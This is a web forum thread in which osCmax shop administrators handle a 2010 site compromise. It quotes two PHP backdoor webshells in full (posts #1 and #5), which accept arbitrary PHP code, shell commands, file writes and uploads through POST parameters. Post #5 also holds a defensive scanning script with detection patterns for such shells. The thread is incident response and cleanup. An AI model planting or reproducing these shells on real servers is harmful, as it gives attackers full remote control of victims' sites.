
mainpage.php contents replaced

This is a discussion on mainpage.php contents replaced within the osCmax v2 Installation issues forums, part of the osCmax v2.0 Forums category.

      
  1. #1 Wolga (New Member, joined Sep 2005, 10 posts)

    mainpage.php contents replaced

    My fault... I should check more often for world-writable files.

    The mainpage.php of a customer's site was world-writable. The contents were replaced with the following code.

    PHP Code:
    <?php
    // Does nothing unless the request carries ?cookies=1, so ordinary visitors never notice it.
    if(@$_GET['cookies']==1){
        echo 'Cookies must be enabled !';
        $tf='';
        if(@$_POST['tf']){$tf=@$_POST['tf'];}      // POST field tf names a target file
        if(@$_POST['e']){eval(@$_POST['e']);}       // POST field e is executed as PHP code
        if(@$_POST['t']){                           // POST field t is written into the target file
            if($tf!=''){$f=fopen($tf,'w');fwrite($f,@$_POST['t']);fclose($f);}
        }
        if(@$_FILES['f']['name']!=''){              // an uploaded file f is saved under its own name
            $tf=$_FILES['f']['name'];
            move_uploaded_file(@$_FILES['f']['tmp_name'],$tf);
        }
        exit;
    }
    ?>

    Does anyone recognize this code, what the hacker or bot intended to do, and how worried I need to be?


    After I encountered this I used the following command to search out world-writable files.

    find / -type f -perm -o+w -exec ls -l {} \;

    Actually without the /, so it would search only the customer's public_html directory, and then I tightened up the permissions.



    Needless to say I'll be running various scans of the system but...

    If anyone recognizes this hack and can give me a hint of what to look for I would be grateful.

    Thanks
    Last edited by Wolga; 08-29-2010 at 01:25 AM.

  2. #2 Wolga (New Member, joined Sep 2005, 10 posts)

    Re: mainpage.php contents replaced

    Update.

    I successfully thwarted the intruder. The logs fortunately told me the IP that modified the file so I blocked it and it hasn't been hacked again yet.

    See attached picture.

    The IP location was Makiyivka in Ukraine, and since she will never ship overseas I blocked it.

    I may try to block a range in case they get a new IP and start their shenanigans again.

    I also complied with your security suggestions and renamed the admin directory and also password protected it.

    Keeping fingers crossed now.

    Hopefully this thwarted them enough so they'll move on to an easier target.

    Nobody so far recognizes that code they inserted?

    The 2 times it was inserted, it was discovered and removed shortly after the insert because she is in the store several times a day and noticed it right away. Hopefully whatever it was doing, it wasn't able to succeed due to being quickly removed.

  3. #3 tcshadow (Active Member, joined Aug 2007, 145 posts)

    Re: mainpage.php contents replaced

    I have been having the same issue... anyone have a fix for this? Michael S?

  4. #4 tcshadow (Active Member, joined Aug 2007, 145 posts)

    Re: mainpage.php contents replaced

    Wolga, check your /images directory; you'll probably find goog1*.php files in there generated by this code or the hacker. I found some in my site.

    CRE Loaded - View topic - Security Breach on our Site

  5. #5 Wolga (New Member, joined Sep 2005, 10 posts)

    Re: mainpage.php contents replaced

    Thanks tcshadow.

    I did find goog1*.php files in the images directory, all with the same IP number reading and writing them.

    I grepped my log files for the culprit IP to see what files were accessed, and also checked for a partial IP.

    I attached a text file of my grepped logs.

    That was a busy script.

    I did as my previous post mentioned and renamed the admin directory.

    Quite a while back I remember deleting the filemanager when the email notice came from oscmax; however, I see that there are access attempts to that file.

    I have now removed the goog*.php files.

    Looks like the accesses stopped after I messed with the security.

    There were a few more attempts after I added the IP to /etc/hosts.deny.
    I added all:91.211.16.126

    Although adding that to hosts.deny seems to have stopped the problem, I still see accesses to some of the files. Not sure how that can be, but it is apparent in the logs.

    I see the last attempt was on the admin directory on the 6th and 7th of Sep/2010, and since the admin directory was renamed they had no luck with that.

    There seem to have been no attempts since then.

    Hope the attached logs.txt file will be helpful to those who have more security expertise than myself.

    The multiple goog*.php files had the same code if anyone knows what it was doing.

    PHP Code:
    Goog1e_analist_up<?php
    $e=@$_POST['e'];
    $s=@$_POST['s'];
    if($e){eval($e);}                   // POST field e is executed as PHP code
    if($s){system($s);}                 // POST field s is run as a shell command
    if($_FILES['f']['name']!=''){       // an uploaded file f is saved under its own name
        move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
    }
    ?>

    I think my focus this week will be upgrading her store. Thank Ancients for Navicat.

    Thanks again tcshadow for the help.
    Last edited by Wolga; 09-12-2010 at 02:18 PM. Reason: If only face book would allow me to edit items that looked ok until I click save
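A defender-side triage script, added here as an example and not code from this thread or from osCmax, that combines the world-writable search from post #1 with a scan for the markers of the goog1*.php shells quoted above (request input reaching eval()/system(), or a move_uploaded_file() call). It assumes POSIX sh with find, grep, chmod and mktemp; the sample tree and file names it builds are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread or from osCmax: triage a web root for
# the two indicators discussed above, world-writable files and PHP files that
# feed request input into eval()/system() or call move_uploaded_file().
# Assumes POSIX sh with find, grep, chmod and mktemp.

# List regular files under $1 that are writable by "other".
find_world_writable() {
    find "$1" -type f -perm -o+w
}

# List PHP files under $1 that both call a code/command execution or upload
# function and read request input; candidates for review, not verdicts.
find_shell_markers() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if grep -qE '(eval|system|shell_exec|passthru|move_uploaded_file)[[:space:]]*\(' "$f" &&
           grep -qE '\$_(POST|GET|REQUEST|FILES)\[' "$f"; then
            echo "$f"
        fi
    done
}

# Remove the "other" write bit from every world-writable file under $1.
fix_world_writable() {
    find "$1" -type f -perm -o+w -exec chmod o-w '{}' \;
}

# Build a constructed sample tree (not real site data) and print its path.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/images"
    printf '<?php echo "store front"; ?>\n' > "$root/mainpage.php"
    chmod 666 "$root/mainpage.php"              # the world-writable mistake
    # One-line marker modelled on the goog1*.php code quoted in this thread.
    printf '<?php $e=@$_POST["e"];if($e){eval($e);}?>\n' > "$root/images/goog1sample.php"
    chmod 644 "$root/images/goog1sample.php"
    echo "$root"
}

# Run with "demo" as the first argument to see the scan on the sample tree.
if [ "${1:-}" = "demo" ]; then
    r=$(make_sample_root)
    echo "world-writable files:"; find_world_writable "$r"
    echo "webshell candidates:";  find_shell_markers "$r"
    fix_world_writable "$r"
    echo "after fix, world-writable files:"; find_world_writable "$r"
    rm -rf "$r"
fi
```

Files flagged by the marker scan need a manual look: legitimate upload handlers in a store also call move_uploaded_file with $_FILES, so the hit list is a starting point for review rather than a verdict.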

  6. #6 Wolga (New Member, joined Sep 2005, 10 posts)

    Re: mainpage.php contents replaced

    I also found 4 of these in the database under manufacturers:

    goog1ec34ca4c49772b8.php

    Different numbers after the goog1 though.

  7. #7 Wolga (New Member, joined Sep 2005, 10 posts)

    Re: mainpage.php contents replaced

    I found this link explaining the malicious code.
    What's the purpose of this PHP code/hack.? - Stack Overflow

  8. #8 dani (Lurker, joined Sep 2010, 3 posts)

    Re: mainpage.php contents replaced

    The first changed file in my site was includes/languages/... / cookie_usage.php

    Can someone change this file's content on the admin side?

  9. #9 Wolga (New Member, joined Sep 2005, 10 posts)

    Re: mainpage.php contents replaced

    Quote Originally Posted by dani:
        The first changed file in my site was includes/languages/... / cookie_usage.php

        Can someone change this file's content on the admin side?

    I'm pretty sure there is no way to edit these types of files from the store admin.

    You can use an FTP, or rather a secure (SFTP), program to download, edit and then re-upload the changed file.

    Make sure to keep a log and detailed notes of the changes you make to core files so when you upgrade your store in the future you can recall all the modifications and merge them into the upgraded files.

    Most hosting service control panels will have a web based file manager you can use to edit files as well.
    Last edited by Wolga; 09-20-2010 at 09:16 PM. Reason: Typo corrections after clicking submit

  10. #10 dani (Lurker, joined Sep 2010, 3 posts)

    Re: mainpage.php contents replaced

    Quote Originally Posted by Wolga:
        I'm pretty sure there is no way to edit these types of files from the store admin.

        You can use an FTP, or rather a secure (SFTP), program to download, edit and then re-upload the changed file.

        Make sure to keep a log and detailed notes of the changes you make to core files so when you upgrade your store in the future you can recall all the modifications and merge them into the upgraded files.

        Most hosting service control panels will have a web based file manager you can use to edit files as well.

    Can he/she use the define_language.php file?
    Last edited by dani; 09-21-2010 at 12:00 AM.
